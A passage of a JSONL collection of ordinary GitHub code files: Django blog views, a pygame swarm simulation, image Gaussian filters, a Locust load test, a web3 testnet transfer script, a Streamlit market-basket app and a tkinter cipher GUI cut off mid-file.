+{"seq_id":"42064809133","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.shortcuts import redirect\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.edit import DeleteView,CreateView,UpdateView\nfrom django.urls import reverse_lazy\nfrom blog.models import Blog,Comments\nfrom blog.forms import User_login,Normal,Image,Video,audio,documents,Com\n# Create your views here.\ndef homeblog(request):\n model = Blog.objects.all()\n if request.method == \"POST\":\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username,password=password)\n if user:\n login(request,user)\n return render(request,'sim/home.html',{'model':model})\n\ndef signup(request):\n form = User_login\n signedup = False\n if request.method == \"POST\":\n form2 = form(request.POST)\n if form2.is_valid():\n f = form2.save()\n f.set_password(f.password)\n f.save()\n signedup = True\n context = {'signup':True,'form':form,'signedup':signedup}\n return render(request,'sim/signin.html',context)\n\n@login_required\ndef out(request):\n logout(request)\n return redirect('homeblog')\n\n@login_required\ndef normalblog(request,pk):\n form = Normal\n norm = True\n user = get_object_or_404(User, pk=pk)\n if request.method == \"POST\":\n form = Normal(request.POST, request.FILES)\n if form.is_valid():\n f = form.save(commit=False)\n f.user = user\n f.save()\n return redirect('homeblog')\n context = {'form':form,'norm':norm}\n return render(request,'sim/upload.html',context)\n\n@login_required\ndef imgblog(request,pk):\n form = Image\n img = True\n user = get_object_or_404(User, pk=pk)\n if request.method == \"POST\":\n form = Image(request.POST, request.FILES)\n if form.is_valid():\n f = form.save(commit=False)\n f.user = user\n f.save()\n return redirect('homeblog')\n context = {'form':form,'img':img}\n return render(request,'sim/upload.html',context)\n\n@login_required\ndef vidblog(request,pk):\n form = Video\n vid = True\n user = get_object_or_404(User, pk=pk)\n if request.method == \"POST\":\n form = Video(request.POST, request.FILES)\n if form.is_valid():\n f = form.save(commit=False)\n f.user = user\n f.save()\n return redirect('homeblog')\n context = {'form':form,'vid':vid}\n return render(request,'sim/upload.html',context)\n\n@login_required\ndef audblog(request,pk):\n form = audio\n aud = True\n user = get_object_or_404(User, pk=pk)\n if request.method == \"POST\":\n form = audio(request.POST, request.FILES)\n if form.is_valid():\n f = form.save(commit=False)\n f.user = user\n f.save()\n return redirect('homeblog')\n context = {'form':form,'aud':aud}\n return render(request,'sim/upload.html',context)\n\n@login_required\ndef Docblog(request,pk):\n form = documents\n doc = True\n user = get_object_or_404(User, pk=pk)\n if request.method == \"POST\":\n form = documents(request.POST, request.FILES)\n if form.is_valid():\n f = form.save(commit=False)\n f.user = user\n f.save()\n return redirect('homeblog')\n context = {'form':form,'doc':doc}\n return render(request,'sim/upload.html',context)\n\nclass Detail(LoginRequiredMixin,DetailView):\n model = Blog\n template_name = 'sim/detail.html'\n\n@login_required\ndef createcomment(request,pk,opk):\n user = get_object_or_404(User, pk=pk)\n blog = get_object_or_404(Blog, pk=opk)\n form = Com\n if request.method == \"POST\":\n form = Com(request.POST, request.FILES)\n if form.is_valid():\n f = form.save(commit=False)\n f.user = user\n f.blog = blog\n f.save()\n return redirect('homeblog')\n context = {'form':form}\n return render(request,'sim/postcomment.html',context)\n\nclass Commentupdate(LoginRequiredMixin,UpdateView):\n model = Comments\n fields = ['comment']\n template_name = 'sim/editcomment.html'\n\nclass Commentdelete(LoginRequiredMixin,DeleteView):\n model = Comments\n template_name = 'sim/deletecomment.html'\n success_url = reverse_lazy('homeblog')\n\nclass Postupdate(LoginRequiredMixin,UpdateView):\n model = Blog\n fields = ['title','post']\n template_name = 'sim/editpost.html'\n\nclass Postdelete(LoginRequiredMixin,DeleteView):\n model = Blog\n template_name = 'sim/deletepost.html'\n success_url = reverse_lazy('homeblog')\n","repo_name":"VKM-BOSS/porto","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74471029286","text":"import csv\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n#CSV_FILE = 'BBLATENCY2022-06-30T12-25-40.csv'\nCSV_FILE = 'SINGLE_SD_2022-06-30.csv'\nUNIQUE_NAMES = ['MONA', 'LISA', 'BOSSA', 'NOVA', 'TERRA', 'COTA']\nRENAMES = {\n 'MONA' : 'NF1',\n 'LISA' : 'NF2',\n 'BOSSA' : 'NF3',\n 'NOVA' : 'NF4',\n 'TERRA' : 'NF5',\n 'COTA' : 'NF6'\n}\ndata = {}\n\n#init data\nfor name in UNIQUE_NAMES:\n data[name] = []\n\ndef get_data():\n global data\n with open(CSV_FILE, 'r') as csvfile:\n reader = csv.reader(csvfile)\n #remove first row\n next(reader)\n for row in reader:\n #col 1 is name, 2 is latency\n data[row[0]].append(float(row[1]))\n\ndef plot_data():\n #copy data to local_data\n local_data = {}\n for name in UNIQUE_NAMES:\n local_data[name] = data[name]\n #only get data 100-300\n for name in UNIQUE_NAMES:\n plt.plot(local_data[name], label=RENAMES[name])\n #plot data\n plt.legend()\n plt.show()\n \n\ndef main():\n global data\n get_data()\n plot_data()\n \n stats = {}\n for name in UNIQUE_NAMES:\n stats[name] = {}\n #round to 3 decimal places\n stats[name]['mean'] = round(np.mean(data[name]), 3)\n stats[name]['std'] = round(np.std(data[name]), 3)\n stats[name]['min'] = round(np.min(data[name]), 3)\n stats[name]['max'] = round(np.max(data[name]), 3)\n\n #print headers\n print(\"{:<20}{:<20}{:<20}{:<20}{:<20}\".format(\"Name\", \"Mean\", \"Std\", \"Min\", \"Max\"))\n\n for name in UNIQUE_NAMES:\n print(\"{:<20}\".format(RENAMES[name]), end='')\n for key in stats[name]:\n print(\"{:<20}\".format(stats[name][key]), end='')\n print()\n print()\n\n\n\n return\n\nif __name__ == '__main__':\n main()","repo_name":"AdmiralPuni/pifly","sub_path":"latencyproc/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42185641142","text":"import pygame\nimport sys\nimport random\nimport math\nimport numpy as np\n\npygame.init()\n\nblack = [0, 0, 0]\nwhite = [255, 255, 255]\n\nsize = (800, 800)\nscreen = pygame.display.set_mode(size)\n\nclock = pygame.time.Clock()\n\n\n'''Coordenadas'''\n# creamos 100 coordenadas aleatorias para las estrellas\nn_robots = 110\nD = 250\nstep = 0.01\n#sep = math.pi*D/(n_robots-20)\nsep = D/2*math.sqrt(2)*4/(n_robots-10)\nrobots_pos = np.random.randint(-200, 1000, (n_robots, 2))\nrobots_pos = robots_pos.astype('float64') \n\ndef update_robots_position(n_robots, D, step, sep, robots_pos):\n \n for i in range(0, n_robots):\n \n r = robots_pos[i]\n \n v = robots_pos - r\n dist = [np.linalg.norm(i) for i in v]\n F = robots_pos[np.argmax(dist)] \n dist[i] = 10\n N = robots_pos[np.argmin(dist)]\n \n midpoint = (N + F)/2 \n v_midpoint = midpoint - r\n \n if np.linalg.norm(v_midpoint, ord = 1) >= D/2:\n robots_pos[i] += step*v_midpoint\n else:\n robots_pos[i] -= step*v_midpoint\n \n v_nearestpoint = N - r\n \n if np.linalg.norm(v_nearestpoint, ord = 1) >= sep:\n robots_pos[i] += step*v_nearestpoint\n else:\n robots_pos[i] -= step*v_nearestpoint\n \n return robots_pos \n\n'''Mouse'''\nfrec=30 \nwhile True:\n for event in pygame.event.get():\n print(event)\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n \n screen.fill(black)\n\n \n for coord in robots_pos:\n pygame.draw.circle(screen, white, coord, 2)\n \n robots_pos = update_robots_position(n_robots, D, step, sep, robots_pos) \n \n if frec<=1000:\n frec += 0.1\n else: frec = 1000\n pygame.display.flip()\n clock.tick(frec)\n","repo_name":"DaniLazaro97/Tanaka-Circle-Formation-Algorithm","sub_path":"TANAKA ALGO CIRCLE FORMATION ANIMATION.py","file_name":"TANAKA ALGO CIRCLE FORMATION ANIMATION.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9651481979","text":"import json\nimport pathlib\nfrom datetime import datetime\nimport pandas as pd\n\nVERSION_FIELD = 'Mapping Version'\nEPO_VERSION_FIELD = 'EPO version'\nDESCRIPTION_FIELD = \"Description\"\nTITLE_FIELD = 'Title'\nIDENTIFIER_FIELD = 'Identifier'\nE_FORMS_SUBTYPE_FIELD = \"eForms Subtype\"\nSTART_DATE_FIELD = \"Start Date\"\nEND_DATE_FIELD = \"End Date\"\nMIN_XSD_VERSION_FIELD = \"Min XSD Version\"\nMAX_XSD_VERSION_FIELD = \"Max XSD Version\"\n\nE_FORMS_SUBTYPE_KEY = \"eforms_subtype\"\nSTART_DATE_KEY = \"start_date\"\nEND_DATE_KEY = \"end_date\"\nMIN_XSD_VERSION_KEY = \"min_xsd_version\"\nMAX_XSD_VERSION_KEY = \"max_xsd_version\"\nTITLE_KEY = \"title\"\nCREATED_KEY = \"created_at\"\nIDENTIFIER_KEY = \"identifier\"\nVERSION_KEY = \"version\"\nDESCRIPTION_KEY = \"description\"\nONTOLOGY_VERSION_KEY = \"ontology_version\"\nMETADATA_CONSTRAINTS_KEY = \"metadata_constraints\"\nCONSTRAINTS_KEY = \"constraints\"\n\nCONCEPTUAL_MAPPINGS_METADATA_SHEET_NAME = \"Metadata\"\n\n\ndef generate_metadata(raw_metadata: dict) -> str:\n \"\"\"\n This feature restructures the metadata into a default format.\n Metadata is formed from 2 parts: metadata for mapping suite and constraints on the mapping suite\n :param raw_metadata:\n :return:\n \"\"\"\n\n def get_list_from_raw_metadata(field_key: str) -> list:\n data = raw_metadata[field_key][0]\n if pd.notna(data):\n return [x.strip() for x in str(data).split(',')]\n else:\n return []\n\n constraints = {E_FORMS_SUBTYPE_KEY: [int(float(x)) for x in get_list_from_raw_metadata(E_FORMS_SUBTYPE_FIELD)],\n START_DATE_KEY: get_list_from_raw_metadata(START_DATE_FIELD),\n END_DATE_KEY: get_list_from_raw_metadata(END_DATE_FIELD),\n MIN_XSD_VERSION_KEY: get_list_from_raw_metadata(MIN_XSD_VERSION_FIELD),\n MAX_XSD_VERSION_KEY: get_list_from_raw_metadata(MAX_XSD_VERSION_FIELD)}\n\n metadata = {TITLE_KEY: raw_metadata[TITLE_FIELD][0], IDENTIFIER_KEY: raw_metadata[IDENTIFIER_FIELD][0],\n CREATED_KEY: datetime.now().isoformat(), VERSION_KEY: raw_metadata[VERSION_FIELD][0],\n ONTOLOGY_VERSION_KEY: raw_metadata[EPO_VERSION_FIELD][0],\n DESCRIPTION_KEY: raw_metadata[DESCRIPTION_FIELD][0],\n METADATA_CONSTRAINTS_KEY: {CONSTRAINTS_KEY: constraints}}\n return json.dumps(metadata)\n\n\ndef mapping_suite_processor_generate_metadata(conceptual_mappings_file_path: pathlib.Path,\n output_metadata_file_path: pathlib.Path):\n \"\"\"\n This function reads metadata from conceptual_mapping_file and generates metadata for a mapping suite package.\n The result is written to the output_metadata_file file.\n :param conceptual_mappings_file_path:\n :param output_metadata_file_path:\n :return:\n \"\"\"\n with open(conceptual_mappings_file_path, 'rb') as excel_file:\n conceptual_mappings_metadata_df = pd.read_excel(excel_file, sheet_name=CONCEPTUAL_MAPPINGS_METADATA_SHEET_NAME)\n raw_metadata = conceptual_mappings_metadata_df.set_index('Field').T.to_dict('list')\n metadata = generate_metadata(raw_metadata=raw_metadata)\n\n with open(output_metadata_file_path, 'w') as metadata_file:\n metadata_file.write(metadata)\n","repo_name":"valipopa/ted-sws","sub_path":"ted_sws/mapping_suite_processor/services/conceptual_mapping_generate_metadata.py","file_name":"conceptual_mapping_generate_metadata.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"3031808863","text":"from hydra.utils import instantiate\nfrom pytorch_lightning import seed_everything\n\nfrom autoalbument.faster_autoaugment.datamodule import FasterAutoAugmentDataModule\nfrom autoalbument.faster_autoaugment.models.faa_model import (\n FAAClassificationModel,\n FAASemanticSegmentationModel,\n)\nfrom autoalbument.search_interface import SearcherBase\n\n\nclass FasterAutoAugmentSearcher(SearcherBase):\n def __init__(self, cfg):\n super().__init__()\n self.cfg = cfg\n self.set_seed()\n self.model = self.create_model()\n self.datamodule = self.create_datamodule()\n self.trainer = self.create_trainer()\n\n def set_seed(self):\n seed = getattr(self.cfg, \"seed\", None)\n if seed is None:\n return\n seed_everything(seed)\n\n def create_model(self):\n cfg = self.cfg\n task = cfg.task\n if task == \"semantic_segmentation\":\n return FAASemanticSegmentationModel(cfg)\n elif task == \"classification\":\n return FAAClassificationModel(cfg)\n raise ValueError(f\"Unsupported task: {task}. Supported tasks: classification, semantic_segmentation.\")\n\n def create_datamodule(self):\n datamodule = FasterAutoAugmentDataModule(self.cfg.data)\n return datamodule\n\n def create_logger(self):\n logger = instantiate(self.cfg.logger)\n return logger\n\n def create_callbacks(self):\n callbacks = self.cfg.callbacks\n if not callbacks:\n return []\n return [instantiate(callback) for callback in callbacks]\n\n def create_trainer_additional_params(self):\n logger = self.create_logger()\n callbacks = self.create_callbacks()\n return {\n \"logger\": logger,\n \"callbacks\": callbacks,\n }\n\n def create_trainer(self):\n cfg = self.cfg\n additional_params = self.create_trainer_additional_params()\n trainer = instantiate(cfg.trainer, **additional_params)\n return trainer\n\n def search(self):\n self.trainer.fit(self.model, datamodule=self.datamodule)\n","repo_name":"albumentations-team/autoalbument","sub_path":"autoalbument/faster_autoaugment/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":192,"dataset":"github-code","pt":"53"} +{"seq_id":"73687250727","text":"# import packages: numpy, math (you might need pi for gaussian functions)\r\nimport numpy as np\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.signal import convolve2d as conv2d\r\n\r\n\r\n\"\"\"\r\nGaussian function taking as argument the standard deviation sigma\r\nThe filter should be defined for all integer values x in the range [-3sigma,3sigma]\r\nThe function should return the Gaussian values Gx computed at the indexes x\r\n\"\"\"\r\ndef gauss(sigma):\r\n # Generate a vector x of values on which the Gaussian filter is defined: integer values on the interval [-3*sigma, 3*sigma]\r\n low = int(-3*sigma)\r\n high = int((3*sigma))\r\n range_x = [i for i in range(low, high+1)]\r\n Gx = []\r\n for x in range_x:\r\n G = (np.exp((-x ** 2) / (2 * (sigma ** 2))))* (1 / (math.sqrt(2 * math.pi)* sigma)) # Formula for gaussian\r\n Gx.append(G)\r\n\r\n # Gx is a list in which we have values calculated by gaussian formula\r\n return np.array(Gx), range_x\r\n\r\n\r\n\"\"\"\r\nImplement a 2D Gaussian filter, leveraging the previous gauss.\r\nImplement the filter from scratch or leverage the convolve2D method (scipy.signal)\r\nLeverage the separability of Gaussian filtering\r\nInput: image, sigma (standard deviation)\r\nOutput: smoothed image\r\n\"\"\"\r\ndef gaussianfilter(img, sigma):\r\n\r\n # fill the kernel with the values on which the G filter is defined (range [-3*sigma,3*sigma])\r\n # extact the first row of the kernel\r\n Gx = gauss(sigma)[0]\r\n\r\n Gx = Gx.reshape(1, Gx.size) # This was done because input to the conv2d need 2d\r\n\r\n\r\n # # computing the first convolution\r\n tmp_img = conv2d(img, Gx, mode='full', boundary='fill', fillvalue=0,)\r\n # now tmp_img (the output of the first convolution) is an array\r\n\r\n\r\n\r\n Gy = np.transpose(Gx)\r\n\r\n # computing the second convolution (on the output of the first one)\r\n smooth_img = conv2d(tmp_img, Gy, mode='full', boundary='fill', fillvalue=0)\r\n # # SOURCE: https://docs.scipy.org/doc/scipy/reference/generated/scipy.signal.convolve2d.html\r\n\r\n return smooth_img\r\n\r\n\"\"\"\r\nGaussian derivative function taking as argument the standard deviation sigma\r\nThe filter should be defined for all integer values x in the range [-3sigma,3sigma]\r\nThe function should return the Gaussian derivative values Dx computed at the indexes x\r\n\"\"\"\r\ndef gaussdx(sigma):\r\n\r\n low = int(-3*sigma)\r\n high = int((3*sigma))\r\n range_x = [i for i in range(low, high+1)]\r\n Dx = []\r\n for x in range_x:\r\n # Just taken derivative of gaussian formula formula\r\n G = -x*(np.exp((-x ** 2) / (2 * (sigma ** 2))))* (1 / (math.sqrt(2 * math.pi)* (sigma**3)))\r\n Dx.append(G)\r\n return np.array(Dx), range_x\r\n#\r\ndef gaussderiv(img, sigma):\r\n\r\n smooth_img = gaussianfilter(img, sigma) # Call gaussian filter function to get smoothen image\r\n\r\n Dx = np.array( [[-1,0,1], # Kernal which we will use to take derivative in x direction\r\n [-1,0,1],\r\n [-1,0,1]])\r\n Dx = Dx/3\r\n\r\n Dy = np.transpose(Dx) # Kernal which we will use to take derivative in y direction\r\n\r\n imgDx = conv2d(smooth_img, Dx, mode='full', boundary='fill', fillvalue=0) # convolving with smoothen image in X direction\r\n\r\n imgDy = conv2d(smooth_img, Dy, mode='full', boundary='fill', fillvalue=0) # convolving with smoothen image in Y direction\r\n\r\n return imgDx, imgDy\r\n","repo_name":"MertYILDIZ19/Image-Filtering-and-Object-Identification","sub_path":"gauss_module.py","file_name":"gauss_module.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"22696171607","text":"import time, json\nfrom locust import HttpUser, task, between\n\norder = {\n \"orderId\": 20001,\n \"customerId\": \"AROUT\",\n \"employeeId\": 1,\n \"shipperId\": 3,\n \"orderDate\": \"1998-05-05T04:00:00.000Z\",\n \"requiredDate\": \"1998-06-02T04:00:00.000Z\",\n \"shippedDate\": \"1998-06-02T04:00:00.000Z\",\n \"freight\": 0.93,\n \"shipName\": \"LILA-Supermercado\",\n \"shipAddress\": \"Carrera 52 con Ave. Bolívar #65-98 Llano Largo\",\n \"shipCity\": \"Barquisimeto\",\n \"shipRegion\": \"Lara\",\n \"shipPostalCode\": \"3508\",\n \"shipCountry\": \"Venezuela\",\n \"orderDetails\": [\n {\n \"orderId\": 20001,\n \"productId\": 7,\n \"unitPrice\": 30,\n \"quantity\": 15,\n \"discount\": 0.05,\n \"product\": {\n \"productId\": 7,\n \"productName\": \"Uncle Bobs Organic Dried Pears\",\n \"quantityPerUnit\": \"12 - 1 lb pkgs.\",\n \"unitPrice\": 30,\n \"unitsInStock\": 15,\n \"unitsOnOrder\": 0,\n \"discontinued\": False\n }\n },\n {\n \"orderId\": 20001,\n \"productId\": 13,\n \"unitPrice\": 6,\n \"quantity\": 10,\n \"discount\": 0.05,\n \"product\": {\n \"productId\": 13,\n \"productName\": \"Konbu\",\n \"quantityPerUnit\": \"2 kg box\",\n \"unitPrice\": 6,\n \"unitsInStock\": 24,\n \"unitsOnOrder\": 0,\n \"discontinued\": False\n }\n }\n ]\n }\n\nclass CreateOrder(HttpUser):\n \n wait_time = between(0.5, 1.2)\n\n @task(3)\n def create_order(self):\n self.client.post(f\"/purchase/order\", data=json.dumps(order), headers={ 'Content-Type': 'application/json'})\n","repo_name":"nullpointer-excelsior/nestjs-northwind-hexagonal","sub_path":"stress-test/locustfile_create_orders.py","file_name":"locustfile_create_orders.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"2520601265","text":"from web3 import Web3\n\nprovider_rpc = {\n \"development\": \"https://goerli.infura.io/v3/3622806d884b401498e7a07f3f325d2e\"\n}\nweb3 = Web3(Web3.HTTPProvider(provider_rpc[\"development\"])) # Change to correct network\n\naccount_from = {\n \"private_key\": \"\",\n \"address\": \"0x1Abf3a6C41035C1d2A3c74ec22405B54450f5e13\",\n}\naddress_to = \"0x5aDF576358c64d33C61378876cbfA342aff9a5D4\"\n\nprint(\n f'Attempting to send transaction from { account_from[\"address\"] } to { address_to }'\n)\n\ntx_create = web3.eth.account.signTransaction(\n {\n \"nonce\": web3.eth.getTransactionCount(account_from[\"address\"]),\n \"gasPrice\": 20000000000,\n \"gas\": 1000000,\n \"to\": address_to,\n \"value\": web3.toWei(\"0.2\", \"ether\"),\n },\n account_from[\"private_key\"],\n)\n\nprint(\"Signed\")\ntx_hash = web3.eth.sendRawTransaction(tx_create.rawTransaction)\nprint(tx_hash.hex())\ntx_receipt = web3.eth.waitForTransactionReceipt(tx_hash)\nprint(f\"Transaction successful with hash: { tx_receipt.transactionHash.hex() }\")","repo_name":"MakC-Ukr/python-in-web3","sub_path":"transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42646384384","text":"# This code transfers all .gjf files to a newly created 'conformers' folder.\nimport os\nimport shutil\n\n# create new directory for .gjf files\nif not os.path.exists('conformers'):\n os.makedirs('conformers')\n\n# move all .gjf files to the new directory\nfor file in os.listdir('.'):\n if file.endswith('.gjf'):\n shutil.move(file, 'conformers/' + file)\n","repo_name":"woojin-lee-ucla/conformer_analysis_scripts","sub_path":"4 transfer .gjf .py","file_name":"4 transfer .gjf .py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20085924726","text":"#%%\n# 处理原始sina_cctv 数据集合\n# 该数据集为 微博列表页 数据,从该数据集中提取出需要爬取的 微博详情页\n# 下面开始数据清洗\nimport numpy as np\nimport pandas as pd \n\n#%%\ndef cleanNanValue(df):\n print(\"how many rows have Nan: \", df.isnull().sum())\n df = df.dropna(axis = \"rows\", how = \"all\")\n print(\"after clean Nan, the shape is: \", df.shape)\n return df\n\n\n#%%\ndataframeList = []\nfor i in range(11):\n csv_path = \"dataset/sina_cctv_raw_data/sina_cctv_list_\" + str(i + 1) + \".csv\"\n print(csv_path)\n dataframeList.append(pd.read_csv(csv_path))\n\nprint(len(dataframeList))\n\n#%%\ndataframeList[0] = cleanNanValue(dataframeList[0])\ndataframeList[0].shape \n\n#%%\nfor i in range(len(dataframeList)):\n dataframeList[i] = cleanNanValue(dataframeList[i])\n dataframeList[i].to_csv(\"dataset/sina_cctv_processed_data/sina_cctv_list_\" + str(i + 1) + \".csv\")\n\n","repo_name":"MineSelf2016/SummerResearch","sub_path":"process/cleanNanValue.py","file_name":"cleanNanValue.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25134990063","text":"\r\nimport streamlit as st\r\nimport pandas as pd\r\nfrom mlxtend.frequent_patterns import apriori, association_rules\r\nimport openpyxl\r\n# Load the association rules data\r\ndf = pd.read_excel('Online Retail.xlsx')\r\ndf['Description'] = df['Description'].str.strip()\r\n\r\ncountries = df['Country'].unique()\r\ncountries = countries[countries != 'United Kingdom']\r\ncountry = st.selectbox(\"Select a country\", countries)\r\n\r\n# Transaction for the selected country\r\nBasket_Country = (df[df['Country'] == country]\r\n .groupby(['InvoiceNo', 'Description'])['Quantity']\r\n .sum().unstack().reset_index().fillna(0)\r\n .set_index('InvoiceNo'))\r\n\r\ndef hot_encoder(x):\r\n if x <= 0:\r\n return 0\r\n if x >= 1:\r\n return 1\r\n\r\nBasket_Encoded = Basket_Country.applymap(hot_encoder)\r\nBasket_Country = Basket_Encoded\r\n\r\n# Applying apriori algorithm for the selected country\r\nfreq_items = apriori(Basket_Country, min_support=0.01, use_colnames=True)\r\n\r\n# Applying association rule\r\nrules = association_rules(freq_items, metric=\"lift\", min_threshold=1)\r\nrules = rules.sort_values(['confidence', 'lift'], ascending=[False, False])\r\n\r\n# Create a Streamlit app\r\ndef main():\r\n st.title(\"Top Association Rules for {}\".format(country))\r\n \r\n # Display the products to promote\r\n st.subheader(\"Products to Promote\")\r\n promote_products = rules[rules['antecedents'].apply(lambda x: len(x) == 1)]\r\n promote_products = promote_products.rename(columns={'antecedents': 'products'})\r\n if 'products' in promote_products.columns:\r\n st.dataframe(promote_products['products'])\r\n else:\r\n st.write(\"No 'products' column found in promote_products DataFrame.\")\r\n\r\n # Display the cross-selling opportunities\r\n st.subheader(\"Cross-Selling Opportunities\")\r\n cross_sell_products = rules[rules['antecedents'].apply(lambda x: len(x) > 1)]\r\n cross_sell_products = cross_sell_products.rename(columns={'antecedents': 'products'})\r\n if 'products' in cross_sell_products.columns:\r\n pd.set_option('display.max_colwidth', None)\r\n st.dataframe(cross_sell_products['products']) \r\n else:\r\n st.write(\"No 'products' column found in cross_sell_products DataFrame.\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"moatazsaad/market","sub_path":"streamlit_apriori.py","file_name":"streamlit_apriori.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75162502568","text":"from station_schema import StationSchema\nimport unittest\nfrom unittest import TestCase\n\n\nclass SchemaTestCase(TestCase):\n def setUp(self):\n self.station_schema = StationSchema()\n self.test_data = {\n \"@id\": \"http://environment.data.gov.uk/flood-monitoring/id/stations/SJ37_030\",\n \"eaRegionName\": \"North West\",\n \"gridReference\": \"SJ3073\",\n \"label\": \"Burton Point Deep\",\n \"measures\": {\n \"@id\": \"http://environment.data.gov.uk/flood-monitoring/id/measures/SJ37_030-level-groundwater-i-1_h-m\",\n \"label\": \"Burton Point Deep - level-groundwater-i-1_h-m\",\n \"latestReading\": {\n \"@id\": \"http://environment.data.gov.uk/flood-monitoring/data/readings/SJ37_030-level-groundwater-i-1_h-m/2022-06-07T02-00-00Z\",\n \"date\": \"2022-06-07\",\n \"dateTime\": \"2022-06-07T02:00:00Z\",\n \"measure\": \"http://environment.data.gov.uk/flood-monitoring/id/measures/SJ37_030-level-groundwater-i-1_h-m\",\n \"value\": 0.479,\n },\n \"notation\": \"SJ37_030-level-groundwater-i-1_h-m\",\n \"parameter\": \"level\",\n \"parameterName\": \"Water Level\",\n \"period\": 3600,\n \"qualifier\": \"Groundwater\",\n \"station\": \"http://environment.data.gov.uk/flood-monitoring/id/stations/SJ37_030\",\n \"stationReference\": \"SJ37_030\",\n \"type\": [\n \"http://environment.data.gov.uk/flood-monitoring/def/core/Measure\",\n \"http://environment.data.gov.uk/flood-monitoring/def/core/WaterLevel\",\n ],\n \"unit\": \"http://qudt.org/1.1/vocab/unit#Meter\",\n \"unitName\": \"m\",\n \"valueType\": \"instantaneous\",\n },\n \"notation\": \"SJ37_030\",\n \"stationReference\": \"SJ37_030\",\n \"type\": \"http://environment.data.gov.uk/flood-monitoring/def/core/Station\",\n }\n\n self.expected_result = {\n \"gridReference\": \"SJ3073\",\n \"label\": \"Burton Point Deep\",\n \"measures_label\": \"Burton Point Deep - level-groundwater-i-1_h-m\",\n \"measure_value\": 0.479,\n \"measure_date_time\": \"2022-06-07T02:00:00Z\",\n \"measure_date\": \"2022-06-07\",\n \"measures_notation\": \"SJ37_030-level-groundwater-i-1_h-m\",\n \"measures_parameter\": \"level\",\n \"measures_parameterName\": \"Water Level\",\n \"measures_period\": \"3600\",\n \"measures_qualifier\": \"Groundwater\",\n \"measures_valueType\": \"instantaneous\",\n \"stationReference\": \"SJ37_030\",\n }\n\n def test_dump(self):\n print(\"This called\")\n result = self.station_schema.dump(self.test_data)\n self.assertEquals(result, self.expected_result)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"damilareisaac/flood_monitoring_data_pipeline","sub_path":"schema/test_schema.py","file_name":"test_schema.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4546986330","text":"from tkinter import W\nimport unittest\nimport parseStruct\nimport print_format\n\nclass TestStructToPrintf(unittest.TestCase):\n def test_parse_struct(self):\n fileName = './test_sample_header.h'\n dic = parseStruct.parseStruct(fileName)\n expect = {'HOGE2': {'a': 'long', 'b': 'HOGE', 'c': 'float'},'HOGE': {'a': 'int', 'b': 'char*'}} \n self.assertDictEqual(dic, expect)\n\n def test_print_format(self):\n fileName = './test_sample_header.h'\n dic = parseStruct.parseStruct(fileName)\n ret = print_format.createPrintFormat(dic)\n expect = ['printf(\"%s a:%d b:%s\", \"HOGE\", info.a, info.b);', 'printf(\"%s a:%ld b:%s c:%f\", \"HOGE2\", info.a, info.b, info.c);']\n self.assertEqual(ret, expect)\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"maruhiko/c-util","sub_path":"StructToPrintf/test_struct_to_printf.py","file_name":"test_struct_to_printf.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39895310617","text":"import tkinter as tk\nfrom dataclasses import dataclass\nimport rsa\nimport viziner\n\n\n@dataclass\nclass Text:\n value: tk.Entry\n salt: tk.Entry\n rsa_first: tk.Entry\n rsa_second: tk.Entry\n\n def __init__(self):\n self.salt = None\n self.value = None\n self.rsa_first = None\n self.rsa_second = None\n\n\nwindow = tk.Tk()\nwindow.wm_title(\"mod23\")\nwidth_m = 50\nentrys = Text()\n\n\ndef add_gap():\n label_gap = tk.Label(\n height=1,\n width=width_m\n )\n label_gap.pack()\n\n\ndef convert():\n add_gap()\n label_num.pack()\n entrys.value.pack()\n add_gap()\n label_salt.pack()\n entrys.salt.pack()\n add_gap()\n label_rsa.pack()\n entrys.rsa_first.pack()\n entrys.rsa_second.pack()\n btn_generate.pack()\n label_num_with_salt_cipher_text.pack()\n add_gap()\n label_num_with_salt_cipher.pack()\n add_gap()\n label_errors.pack()\n\n\ndef button_click():\n if not entrys.value.get().isascii():\n label_errors[\"text\"] = \"Text wrong\"\n return\n\n if not 